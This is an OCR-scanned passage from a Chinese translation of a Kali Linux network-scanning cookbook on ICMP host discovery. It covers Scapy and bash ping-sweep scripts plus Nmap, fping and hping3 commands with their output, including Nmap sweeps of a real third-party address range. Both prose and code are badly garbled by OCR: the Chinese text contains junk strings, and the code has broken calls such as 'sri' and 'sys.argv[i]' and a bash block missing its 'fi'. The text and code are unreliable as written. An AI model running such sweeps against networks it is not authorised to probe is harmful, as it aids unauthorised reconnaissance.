if answer == None: 
pass 
else: 
print prefix+str (addr) 


脚本 的 第 一 行 标 识 了 Python 解释 器 所 在 的 位 置 ， 以 便 脚 本 可 以 在 不 传递 到 解释 器 
的 情况 下 执行 。 然后 脚本 导入 所 有 Scapy 函数 ， 并 定义 Scapy 日 志 记录 级 别 ， 以 
消除 脚本 中 不 必要 的 输出 。 还 导入 了 子 过 程 库 ， 以 便于 从 系统 调用 中 提取 信息 。 
第 二 个 代码 块 是 条 件 测试 ， 用 于 评估 是 否 向 脚本 提供 了 所 需 的 参数 。 如 果 在 执行 时 
未 提供 所 需 的 参数 ， 则 脚本 将 输出 使 用 情况 的 说 明 。 该 说 明 包 括 工具 的 用 法 ， 示 例 
和 所 执行 任务 的 解释 。 


在 这 个 代码 块 之 后 ， 有 一 个 单独 的 代码 行将 所 提供 的 参数 赋值 给 interface & 

量 。 下 一 个 代码 块 使 用 check output() 子 进程 函数 执行 ifconfig 系统 调用 ， 
该 调用 也 使 用 grep 和 cut 从 作为 参数 提供 的 本 地 接口 提取 P 地 址 。 然 后 将 此 输 
BERA ip 变量 。 然 后 使 用 split 函数 从 IP 地 址 字符 串 中 提取 / 24 网 络 前 
级。 例如 ， 如 果 ip 变量 包含 192.168.11.4 字符 串 ， 则 值 为 192.168.11 ° Č 
将 赋 给 prefix 变量 。 


最 后 一 个 代码 块 是 一 个 用 于 执行 实际 扫描 的 for 循环 。 for 循环 遍历 介 于 0 和 
254 之 间 的 所 有 值 ， 并且 对 于 每 次 迭代 ， 该 值 随后 附加 到 网 络 前 级 后 面 。 在 早先 提 
供 的 示例 的 中 ， 将 针对 192.168.11.0 和 192.168.11.254 之 问 的 每 个 IP 地 址 
发 送 ICMP 回 显 请 求 。 然 后 对 于 每 个 回复 的 活动 主机 ， 将 相应 的 IP 地 址 打印 到 屏 
幕 上 ， 以 表明 主机 在 LAN 上 活动 。 一 旦 脚本 被 写 入 本 地 目录 ， 你 可 以 在 终端 中 使 
用 多 号 和 斜 枉 ， 然 后 是 可 执行 脚本 的 名 称 来 执行 它 。 看 看 以 下 用 于 执行 脚本 的 命 


令 : 


root@KaliLinux:~# ./pinger.py 

Usage - ./pinger.py [/24 network address] 

Example - ./pinger.py 172.16.36.0 

Example will perform an ICMP scan of the 172.16.36.0/24 range 
root@KaliLinux:~# ./pinger.py 

172.16.36.0 

172.16.36.2 

172.16.36.1 

172.16.36.132 

172.16.36.135 


如 果 在 没有 提供 任何 参数 的 情况 下 执行 脚本 ， 则 会 将 使 用 方法 输出 到 屏幕 。 使 用 方 
法 输出 表明 ， 此 脚本 需要 用 于 定义 要 扫描 的 / 24 网 络 的 单个 参数 。 提供 的 示例 
使 用 172.16.36.0 网 络 地 址 来 执行 脚本 。 该 脚本 然后 输出 在 / 24 网 络 范围 上 
的 活动 IP 地 址 的 列表 。 此 输出 也 可 以 使 用 尖 括 号 重 定向 到 输出 文本 文件 ， 后 跟 输 
出 文件 名 。 一 个 例子 如 下 : 


root@KaliLinux:~# ./pinger.py 172.16.36.0 > output.txt 
root@KaliLinux:~# ls output.txt 

output.txt 

root@KaliLinux:~# cat output.txt 

172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 


然后 可 以 使 用 1s 命令 来 验证 输出 文件 是 否 已 写 入 文件 系统 ， 或 者 可 以 使 
用 cat 命令 查看 其 内 容 。 也 可 以 修改 此 脚本 ， 来 接受 IP 地 址 列表 作为 输入 。 A 
此 ， 必 须 更 改 for 循环 来 循环 遍历 从 指定 的 文本 文件 读 取 的 行 。 一 个 例子 如 下 : 


#!/usr/bin/python 


import logging 
logging. getLogger("sScapy. runtime") .setLevel(logging.ERROR) 
from scapy.all import * 


if len(sys.argv) != 2: 

print "Usage - ./pinger.py [filename]" 

print "Example - ./pinger.py iplist.txt" 

print "Example will perform an ICMP ping scan of the IP addr 
esses listed in iplist.txt" 

sys.exit() 


filename = str(sys.argv[i]) 
file = open(filename, 'r' ) 


for addr in file: 
ans=sri(IP(dst=addr.strip())/ICMP(), timeout=1, verbose=0 ) 
if ans == None: 
pass 
else: 
print addr.strip() 


与 之 前 的 脚本 唯一 的 主要 区 别 是 ， 它 接受 一 个 输入 文件 名 作为 参数 ， 然 后 循环 遍历 
此 文件 中 列 出 的 每 个 IP 地 址 进行 扫描 。 与 其 他 脚本 类 似 ， 生 成 的 输出 包括 响应 
ICMP 回 显 请 求 的 系统 的 相关 IP 地 址 的 简单 列表 ， 其 中 包含 ICMP 回 显 响应 : 


root@KaliLinux:~# ./pinger.py 

Usage - ./pinger.py [filename] 

Example - ./pinger.py iplist.txt 

Example will perform an 

ICMP ping scan of the IP addresses listed in iplist.txt 
root@KaliLinux:~# ./pinger.py iplist.txt 

172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 


此 脚本 的 输出 可 以 以 相同 的 方式 重 定向 到 输出 文件 。 使 用 作为 参数 提供 的 输入 文件 
来 执行 脚本 ， 然 后 使 用 尖 括 号 重 定 向 输出 ， 后 跟 输 出 文本 文件 的 名 称 。 一 个 例子 如 
F: 


root@KaliLinux:~# ./pinger.py iplist.txt > output.txt 
root@KaliLinux:~# ls output.txt 

output.txt 

root@KaliLinux:~# cat output.txt 

172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 


工作 原理 


此 处 使 用 Scapy 通过 构造 包括 IP 层 和 附加 的 ICMP 请 求 的 请 求 来 执行 ICMP 第 三 
层 发 现 。IP 层 能 够 将 封包 路 由 到 本 地 网 络 之 外 ， 并 且 ICMP 请 求 用 于 从 远程 系统 
请 求 响 应 。 在 Python 脚本 中 使 用 此 技术 ， 可 以 按 顺序 执行 此 任务 ， 来 扫描 多 个 系 
统 或 整个 网 络 范围 。 


2.8 使 用 Nmap 发 现 第 三 层 


Nmap X Kali Linux 中 最 强大 和 最 通用 的 扫描 工具 之 一 。 因此 ， 毫 不 奇怪 ，Nmap 
也 支持 ICMP 发 现 扫描 。 该 秘籍 演示 了 如 何 使 用 Nmap 在 远程 主机 上 执行 第 三 层 
发 现 。 


准备 


使 用 Nmap 执行 第 三 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回复 
ICMP 回 显 请 求 。 但 是 ， 强 烈 建议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 网 络 
扫描 ， 除 非 你 完全 熟悉 您 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实验 环 
境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 ICMP 请 求 的 系统 。 在 提供 的 示例 中 ， 使 
用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 多 信息 ， 
请 参阅 第 一 章 中 的 “安装 Metasploitable2” 和 “安装 Windows Server" 秘 籍 。 此 外 ， 本 
节 还 需要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 
的 更 多 信息 ， 请 参阅 第 一 章 中 的 "使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


Nmap 是 一 种 自 适 应 工具 ， 它 可 以 按 需 自动 调整 ， 并 执行 第 2 层 ， 第 3 层 或 第 4 层 发 
现 。 如 果 -sn 选项 在 Nmap 中 用 于 扫描 本 地 网 段 上 不 存在 的 IP 地 址 ， 则 ICMP 
回 显 请 求 将 用 于 确定 主机 是 否 处 于 活动 状态 和 是 否 响应 。 为 了 对 单个 目标 执行 

ICMP 扫描 ， 请 使 用 带 有 -sn 选项 的 Nmap， 并 传递 要 扫描 的 IP 地 址 作为 参数 : 


root@KaliLinux:~# nmap -sn 74.125.228.1 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-16 23:05 EST 
Nmap scan report for iad23s05-in-f1.1e100.net (74.125.228.1) 
Host is up (0.00013s latency). 

Nmap done: 1 IP address (1 host up) scanned in 0.02 seconds 


此 命令 的 输出 表明 了 设备 是 否 已 启动 ， 还 会 提供 有 关 所 执行 扫描 的 详细 信息 。 此 外 
请 注意 ， 系 统 名 称 也 已 确定 。 Nmap DNS 解析 来 在 扫描 输 出 中 提供 此 信 
So 它 还 可 以 用 于 使 用 破 折 号 符号 扫描 IP 地 址 连续 范围 。 Nmap 默认 情况 下 是 多 
线程 的 ， 并 且 并 行 运 行 多 个 进程 。 因 此 ，Nmap 在 返回 扫描 结果 时 非常 快 。 看 看 
下 面 的 命令 


root@KaliLinux:~# nmap -sn 74.125.228.1-255 
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-16 23:14 EST 
Nmap scan report for iad23s05-in-f1.1e100.net (74.125.228.1) 
Host is up (0.00012s latency). 
Nmap scan report for iad23s05-in-f2.1e100.net (74.125.228.2) 
Host is up (0.0064s latency). 
Nmap scan report for iad23s05-in-f3.1e100.net (74.125.228.3) 
Host is up (0.0070s latency). 
Nmap scan report for iad23s05-in-f4.1e100.net (74.125.228.4) 
Host is up (0.00015s latency). 
Nmap scan report for iad23s05-in-f5.1e100.net (74.125.228.5) 
Host is up (0.00013s latency). 
Nmap scan report for iad23s05-in-f6.1e100.net (74.125.228.6) 
Host is up (0.00012s latency). 
Nmap scan report for iad23s05-in-f7.1e100.net (74.125.228.7) 
Host is up (0.00012s latency). 
Nmap scan report for iad23s05-in-f8.1e100.net (74.125.228.8) 
Host is up (0.00012s latency). 

*** {TRUNCATED} *** 


在 提供 的 示例 中 ， Nmap M Tda t EA aa rus 围 。 为 了 方便 查看 ， 此 命令 
的 输出 被 截断 。 通过 使 用 Wireshark 分 析 通 过 接口 的 流量 ， 你 可 能 会 注意 到 这 些 地 
址 没有 按 顺序 扫描 。 这 可 以 在 qud. 图 中 看 到 。 xx Nmap 的 多 线程 特性 的 


进一步 证 据 ， 并 展示 了 当 其 他 进程 完成 时 ， 如 何 从 队列 中 的 地 址 启动 进程 : 

No Destination Protocol Info 
85 74.125.228.2 ICMP Echo (ping) request id=0x0620, seq=0/0, ttl-52 
86 74.125.228.3 ICMP Echo (ping) request 1d-0x3507, seq-0/0, ttl-50 
87 74.125.228.4 ICMP Echo (ping) request id-z0xa375, seq=0/0, ttl-44 
88 74.125.228.5 ICMP Echo (ping) request id=0xc693, seq=0/0, ttl=45 
89 74.125.228.6 ICMP Echo (ping) request id=Ox2f9b, seq=0/0, ttl-56 
90 74.125.228.7 ICMP Echo (ping) request id=Oxfa75, seq-0/O, ttl=43 


KRHA? Nmap 也 可 用 于 扫描 输入 文本 文件 中 的 IP 地 址 。 这 可 以 使 用 -iL 选项 ， 后 
跟 文件 或 文件 路 径 的 名 称 来 完成 : 


root@KaliLinux:~# cat iplist.txt 

74.125.228.13 74.125.228.28 

74.125.228.47 74.125.228.144 

74.125.228.162 74.125.228.211 

root@KaliLinux:~# nmap -iL iplist.txt -sn 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-16 23:14 EST 
Nmap scan report for iad23s05-in-f13.1e100.net (74.125.228.13) 
Host is up (0.00010s latency). 

Nmap scan report for iad23s05-in-f28.1e100.net (74.125.228.28) 
Host is up (0.0069s latency). 

Nmap scan report for iad23s06-in-f15.1e100.net (74.125.228.47) 
Host is up (0.0068s latency). 

Nmap scan report for iad23s17-in-f16.1e100.net (74.125.228.144) 
Host is up (0.00010s latency). 

Nmap scan report for iad23s18-in-f2.1e100.net (74.125.228.162) 
Host is up (0.0077s latency). 

Nmap scan report for 74.125.228.211 

Host is up (0.00022s latency). 

Nmap done: 6 IP addresses (6 hosts up) scanned in 0.04 seconds 


在 提供 的 示例 中 ， 执 行 目录 中 存在 六 个 IP 地 址 的 列表 。 然后 将 此 列表 输入 到 
Nmap 中 ， 并 扫描 每 个 列 出 的 地 址 来 尝试 识别 活动 主机 。 


工作 原理 


Nmap 通过 对 提供 的 范围 或 文本 文件 中 的 每 个 IP 地 址 发 出 ICMP 回 显 请 求 ， 来 执 
行 第 3 层 扫 描 。 由 于 Nmap 是 一 个 多 线程 工具 ， 所 以 它 会 并 行 发 送 多 个 请 求 ， 结 果 
会 很 快 返回 给 用 户 。 由 于 Nmap 的 发 现 功能 是 自 适应 的 ， 它 只 会 使 用 ICMP 发 
现 ， 如 果 ARP 发 现 无 法 有 效 定位 本 地 子 网 上 的 主机 。 或 者 ， 如 果 ARP 发 现 或 
ICMP 发 现 都 不 能 有 效 识 别 给 定 IP 地 址 上 的 活动 主机 时 ， 那 么 将 采 第 四 层 发 现 技 
术 。 


2.9 使 用 fping 探索 第 三 层 


fping 工具 费 长 类 似 于 著名 的 ping 工具 。 但 是 ， 它 也 内 建 了 在 ping 中 不 存 
在 的 许多 附加 功能 。 这 些 附 加 功能 让 fping 能 够 用 作 功 能 扫描 工具 ， 无 需 额外 修 
改 。 该 秘籍 演示 了 如 何 使 用 fping 在 远程 主机 上 执行 第 3 层 发 现 。 


准备 


使 用 fping 执行 第 三 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回 
复 ICMP 回 显 请 求 。 但 是 ， 强 烈 建议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 网 
络 扫描 ， 除 非 你 完全 熟悉 您 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实验 
环境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 ICMP 请 求 的 系统 。 在 提供 的 示例 中 ， 
使 用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 多 信 

息 ， 请 参阅 第 一 章 中 的 “安装 Metasploitable2”" 和 “安装 Windows Server" 秘 籍 。 


操作 步骤 


fping 非常 类 似 于 添加 了 一 些 额 外 功能 的 ping 工具 。 它 可 以 以 ping 的 相同 
方式 ， 向 单个 目标 发 送 ICMP 回 显 请 求 ， 以 确定 它 是 否 活动 。 这 通过 将 IP 地 址 作 
为 参数 传递 给 fping 实用 程序 来 完成 : 


root@KaliLinux:~# fping 172.16.36.135 
172.16.36.135 is alive 


与 标准 ping 工具 不 同 ， fping 会 在 收 到 单个 应 答 后 停止 发 送 ICMP 回 显 请 求 。 
在 接收 到 回复 时 ， 它 将 显示 对 应 该 地 址 的 主机 是 活动 的 。 或者， 如 果 未 从 地 址 接收 
到 响应 ， 则 在 确定 主机 不 可 达 之 前 ， fping 通常 尝试 联系 系统 四 次 : 


root@KaliLinux:~# fping 172.16.36.136 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.136 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.136 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.136 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 
172.16.36.136 172.16.36.136 is unreachable 


可 以 使 用 -c count 选项 修改 此 默认 连接 尝试 次 数 ， 并 向 其 提供 一 个 定义 尝试 次 数 
的 整数 值 : 


root@KaliLinux:~# fping 172.16.36.135 -c 1 
172.16.36.135 : [0], 84 bytes, 0.67 ms (0.67 avg, 0% loss) 


172.16.36.135 : xmt/rcv/%loss = 1/1/0%, min/avg/max = 0.67/0.67/ 
0.67 
root@KaliLinux:~# fping 172.16.36.136 -c 1 


172.16.36.136 : xmt/rcv/%loss = 1/0/10096 


当 以 这 种 方式 执行 时 ， 和 输出 更 加 隐蔽 一 些 ， 但 可 以 通过 仔细 分 析 来 理解 。 任 何 主机 
的 输出 包括 IP 地址 ， 尝 试 次 数 ( xmt ) ， 接 收 的 回复 数 ( rcv ) 和 丢失 百分比 
( «loss ) 。 在 提供 的 示例 中 ， fping 发 现 第 一 个 地 址 处 于 联机 状态 。 这 可 以 
由 接收 的 字 节 数 和 应 答 的 等 待 时 间 都 被 返回 的 事实 来 证 明 。 你 还 可 以 通过 检查 百 分 
比 损失 ， 来 轻松 确定 是 否 存在 与 提供 的 IP 地址 关联 的 活动 主机 。 如 果 百 分 比 损失 
为 100， 则 未 收 到 回复 。 

与 ping (最 常用 作 故 障 排除 工具 ) 不 同 ， fping 内 建 了 集成 功能 ， 可 扫描 多 个 
主机 。 可 以 使 用 fping 扫描 主机 序列 ， 使 用 -g 选项 动态 生成 IP 地 址 列表 。 要 
指定 扫描 范围 ， 请 使 用 该 参数 传递 所 需 序 列 范 围 中 的 第 一 个 和 最 后 一 个 IP 地 址 : 


root@KaliLinux:~# fping -g 172.16.36.1 172.16.36.4 

172.16.36.1 is alive 

172.16.36.2 is alive 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.3 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.3 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.3 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.3 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.4 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.4 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.4 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.4 172.16.36.3 is unreachable 

172.16.36.4 is unreachable 


生成 列表 选项 也 可 用 于 基于 CIDR 范围 符号 生成 列表 。 以 相同 的 方式 ， fping 将 
循环 遍历 这 个 动态 生成 的 列表 并 扫描 每 个 地 址 : 


root@KaliLinux:~# fping -g 172.16.36.0/24 
172.16.36.1 is alive 
172.16.36.2 is alive 
ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.3 
ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.4 
ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.5 
ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.6 
ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.7 
ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.8 
ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.9 

*** {TRUNCATED} *** 


最 后 ， fping 还 可 以 用 于 扫描 由 输入 文本 文件 的 内 容 指定 的 一 系列 地 址 。 要 使 用 
输入 文件 ， 请 使 用 -f 文件 选项 ， 然 后 提供 输入 文件 的 文件 名 或 路 径 : 


root@KaliLinux:~# fping -f iplist.txt 172.16.36.2 is alive 172.1 
6.36.1 is alive 172.16.36.132 is alive 172.16.36.135 is alive 17 
2.16.36.180 is alive 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.203 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.203 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.203 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.203 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.205 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.205 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.205 

ICMP Host Unreachable from 172.16.36.180 for ICMP Echo sent to 1 
72.16.36.205 

172.16.36.203 is unreachable 

172.16.36.205 is unreachable 

172.16.36.254 is unreachable 


工作 原理 


fping 工具 执行 ICMP 发 现 的 方式 与 我 们 之 前 讨论 的 其 他 工具 相同 。 对 于 每 个 |P 
地 址 ， fping 发 送 一 个 或 多 个 ICMP 回 显 请 求 ， 然 后 评估 所 接收 的 响应 以 识别 》 
动 主机 。 fping 还 可 以 用 于 通过 提供 适当 的 参数 ， 来 扫描 一 系列 系统 或 IP 地 址 
的 输入 列表 。 因此 ， 我 们 不 必 使 用 bash 脚本 来 操作 工具 ， 就 像 使 用 ping 操作 
一 样 ， 使 其 成 为 有 效 的 扫描 工具 。 


2.10 使 用 hping3 探索 第 三 层 


hping3 可 以 用 于 以 多 种 不 同方 式 执 行 主机 发 现 的 更 多 功能 。 它 比 fping 更 强 
大 ， 因 为 它 可 以 执行 多 种 不 同类 型 的 发 现 技术 ， 但 作为 扫描 工具 不 太 有 用 ， 因 为 它 
只 能 用 于 定位 单个 主机 。 然而 ， 这 个 缺点 可 以 使 用 bash 脚本 克服 。 该 秘籍 演示 了 
如 何 使 用 hping3 在 远程 主机 上 执行 第 3 层 发 现 。 


准备 


使 用 hping3 执行 第 三 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回 
复 ICMP 回 显 请 求 。 但 是 ， 强 烈 建 议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 网 
络 扫 描 ， 除 非 你 完全 熟悉 您 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实验 
环境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 ICMP 请 求 的 系统 。 在 提供 的 示例 中 ， 

使 用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 多 信 

息 ， 请 参阅 第 一 章 中 的 “安装 Metasploitable2? 和 "安装 Windows Server" 秘籍。 


hpinga 是 一 个 非常 强大 的 发 现 工具 ， 具 有 大 量 可 操作 的 选项 和 模式 。 它 能 够 在 第 
3 层 和 第 4 层 上 执行 发 现 。 为 了 使 用 hping3 对 单个 主机 地 址 执行 基本 的 ICMP 发 
现 ， 只 需要 将 要 测试 的 IP 地 址 和 所 需 的 ICMP 扫描 模式 传递 给 它 : 


root@KaliLinux:~# hping3 172.16.36.1 --icmp 

HPING 172.16.36.1 (eth1 172.16.36.1): icmp mode set, 28 headers 
+ © data bytes 
len-46 ip-172.16.36. 
len-46 ip-172.16.36. 
len-46 ip-172.16.36. 
len-46 ip-172.16.36. 
len-46 ip-172.16.36. 
^C 

--- 172.16.36.1 hping statistic --5 packets transmitted, 
5 packets received, 0% packet loss 

round-trip min/avg/max = 0.3/0.4/0.6 ms 


ttl=64 id=41835 icmp_seq=0 rtt=0.3 ms 
ttl-64 id=5039 icmp_seq=1 rtt=0.3 ms 

ttl-64 id=54056 icmp_seq=2 rtt=0.6 ms 
ttl-64 id=50519 icmp_seq=3 rtt=0.5 ms 
ttl-64 id=47642 icmp_seq=4 rtt=0.4 ms 


ee 


提供 的 演示 使 用 Ctrl + C 停止 进程 。 与 标准 ping 工具 类 似 ， hping3 ICMP 
模式 将 无 限 继续 ， 除 非 在 初始 命令 中 指定 了 特定 数量 的 数据 包 。 为 了 定义 要 发 送 的 
尝试 次 数 ， 应 包含 -c 选项 和 一 个 表示 所 需 尝试 次 数 的 整数 值 : 


root@KaliLinux:~# hping3 172.16.36.1 --icmp -c 2 

HPING 172.16.36.1 (eth1 172.16.36.1): icmp mode set, 28 headers 
+ © data bytes 

len-46 ip-172.16.36.1 ttl-64 id-40746 icmp_seq=0 rtt=0.3 ms 
len-46 ip-172.16.36.1 ttl-64 id=12231 icmp_seq=1 rtt=0.5 ms 
172.16.36.1 hping statistic -- 

2 packets transmitted, 2 packets received, 0% packet loss 
round-trip min/avg/max = 0.3/0.4/0.5 ms 


虽然 hping3 默认 情况 下 不 支持 扫描 多 个 系统 ， 但 可 以 使 用 bash 脚本 轻易 编写 脚 
本 。 为 了 做 到 这 一 点 ， 我 们 必须 首先 确定 与 活动 地 址 相关 联 的 输出 ， 以 及 与 非 响应 
地 址 相关 联 的 输出 之 间 的 区 别 。 为 此 ， 我 们 应 该 在 未 分 配 主 机 的 IP 地 址 上 使 用 相 
同 的 命令 : 


root@KaliLinux:~# hping3 172.16.36.4 --icmp -c 2 

HPING 172.16.36.4 (eth1 172.16.36.4): icmp mode set, 28 headers 
* 0 data bytes 

172.16.36.4 hping statistic -- 

2 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max - 0.0/0.0/0.0 ms 

1 packets transmitted, packets received, 0% packet loss 
round-trip min/avg/max 0.2/0.2/0.2 ms 

--- 172.16.36.4 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 


lH P I 


尽管 产生 了 期 望 的 结果 ， 在 这 种 情况 下 ， grep 函数 似乎 不 能 有 效用 于 输出 。 由 
于 hping3 中 的 输出 显示 处 理 ， 它 难以 通过 管道 传递 到 grep 函数 ， 并 只 提取 所 
需 的 行 ， 我 们 可 以 尝试 通过 其 他 方式 解决 这 个 问题 。 具体 来 说 ， 我 们 将 尝试 确定 输 
出 是 否 可 以 重 定向 到 一 个 文件 ， 然 后 我 们 可 以 直接 从 文件 中 grep » 为 此 ， 我 们 
尝试 将 先前 使 用 的 两 个 命令 的 输出 传递 给 handle.txt 文件 : 


root@KaliLinux:~# hping3 172.16.36.1 --icmp -c 1 >> handle.txt 


--- 172.16.36.1 hping statistic -- 

1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 0.4/0.4/0.4 ms 

root@KaliLinux:~# hping3 172.16.36.4 --icmp -c 1 >> handle.txt 


--- 172.16.36.4 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 

root@KaliLinux:~# cat handle.txt 

HPING 172.16.36.1 (eth1 172.16.36.1): icmp mode set, 28 headers 
+ © data bytes 

len-46 ip-172.16.36.1 ttl-64 id-56022 icmp seq-0 rtt=0.4 ms 
HPING 172.16.36.4 (eth1 172.16.36.4): icmp mode set, 28 headers 
+ © data bytes 


虽然 这 种 尝试 并 不 完全 成 功 ， 因 为 输出 没有 完全 重 定向 到 文件 ， 我 们 可 以 看 到 通过 
读 取 文 件 中 的 和 输出， 足以 创建 一 个 有 效 的 脚本 。 具体 来 说 ， 我 们 能 够 重 定 向 一 个 唯 
R E E ee 并 且 包 含 该 行 中 相应 的 IP 地 址 。 要 

验证 此 解决 方法 是 否 可 行 ， 我 们 需要 尝试 循环 访问 / 24 范围 中 的 每 个 地 址 ， 然 后 
将 结果 传递 到 s 文件 : 


root@KaliLinux:~# for addr in $(seq 1 254); do hping3 172.16.36. 
$addr --icmp -c 1 »» handle.txt & done 


--- 172.16.36.2 hping statistic -- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 6.6/6.6/6.6 ms 


--- 172.16.36.1 hping statistic -- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 55.2/55.2/55.2 ms 


--- 172.16.36.8 hping statistic -- 
1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 

*** {TRUNCATED} *** 


通过 这 样 做 ， 仍 然 有 大 量 的 输出 (提供 的 输出 为 了 方便 而 被 截断 ) 包含 未 重 定向 到 
文件 的 输出 。 但 是 ， 以 下 脚本 的 成 功 不 取决 于 初始 循环 的 过 多 输出 ， 而 是 取决 于 从 
输出 文件 中 提取 必要 信息 的 能 


root@KaliLinux:~# ls 

Desktop handle.txt  pinger.sh 

root@KaliLinux:~# grep len handle.txt 

len-46 ip-172.16.36.2 ttl-128 id=7537 icmp seq-0 rtt=6.6 ms 

len-46 ip-172.16.36.1 ttl-64 id-56312 icmp seq-0 rtt=55.2 ms 

len-46 ip-172.16.36.132 ttl-64 id-47801 icmp seq-0 rtt-27.3 ms 

len=46 ip-172.16.36.135 ttl-64 id=62601 icmp_seq=0 rtt=77.9 ms 

root@KaliLinux:~# grep len handle.txt | cut -d " " -f 2 

ip-172.16.36.2 

ip-172.16.36.1 

ip-172.16.36.132 

ip-172.16.36.135 

root@KaliLinux:~# grep len handle.txt | cut -d " " -f 2 | cut -d 
Wwe SAP 2 

172.16.36.2 

172.16.36.1 

172.16.36.132 

172.16.36.135 


通过 将 输出 使 用 管道 连接 到 一 系列 cut 函数 ， 我 们 可 以 从 输出 中 提取 IP 地址。 
现在 我 们 已 经 成 功 地 确定 了 一 种 方法 ， 来 扫描 多 个 主机 并 轻易 识别 结果 ， 我 们 应 该 
将 其 集成 到 一 个 脚本 中 。 将 所 有 这 些 操作 组 合 在 一 起 的 功能 脚本 的 示例 如 下 : 


#!/bin/bash 


if [ "$#" -ne 1 ]; then 

echo "Usage - ./ping sweep.sh [/24 network address]" 

echo "Example - ./ping sweep.sh 172.16.36.0" 

echo "Example will perform an ICMP ping sweep of the 172.16. 
36.0/24 network and output to an output.txt file" 

exit 
ipu 


prefix=$(echo $1 | cut -d '.' -f 1-3) 


for addr in $(seq 1 254); do 
hping3 $prefix.$addr --icmp -c 1 >> handle.txt; 
done 


grep len handle.txt | cut -d " " -f 2 | cut -d "=" -f 2 >> outpu 
t.txt 
rm handle.txt 


在 提供 的 bash 脚本 中 ， 第 一 行 定 义 了 bash 解释 器 的 位 置 。 接 下 来 的 代码 块 执行 
测试 来 确定 是 否 提 供 了 预期 的 一 个 参数 。 这 通过 评估 提供 的 参数 的 数量 是 否 不 等 于 
1 来 确定 。 如 果 未 提供 预期 参数 ， 则 输出 脚本 的 用 法 ， 并 且 退 出 脚本 。 用 法 输出 表 
明 ， 脚 本 需要 接受 / 24 网 络 地 址 作为 参数 。 下 一行 代码 从 提供 的 网 络 地 址 中 提 

取 网 络 前 级 。 例 如， 如 果 提 供 的 网 络 地 址 是 192.168.11.0 ， 则 前 级 变量 将 被 赋 

值 为 192.168.11 ° 然后 对 / 24 范围 内 的 每 个 地 址 执行 hping3 操作 ， 并 将 每 
个 任务 的 结果 输出 放 入 handle.txt 文件 中 。 


一 旦 完成 ，grep 用 于 从 handle 文件 中 提取 与 活动 主机 响应 相关 联 的 行 ， 然 后 
从 这 些 行 中 提取 IP 地 址 。 然后 将 生成 的 IP 地 址 传递 到 output.txt 文件， 并 从 
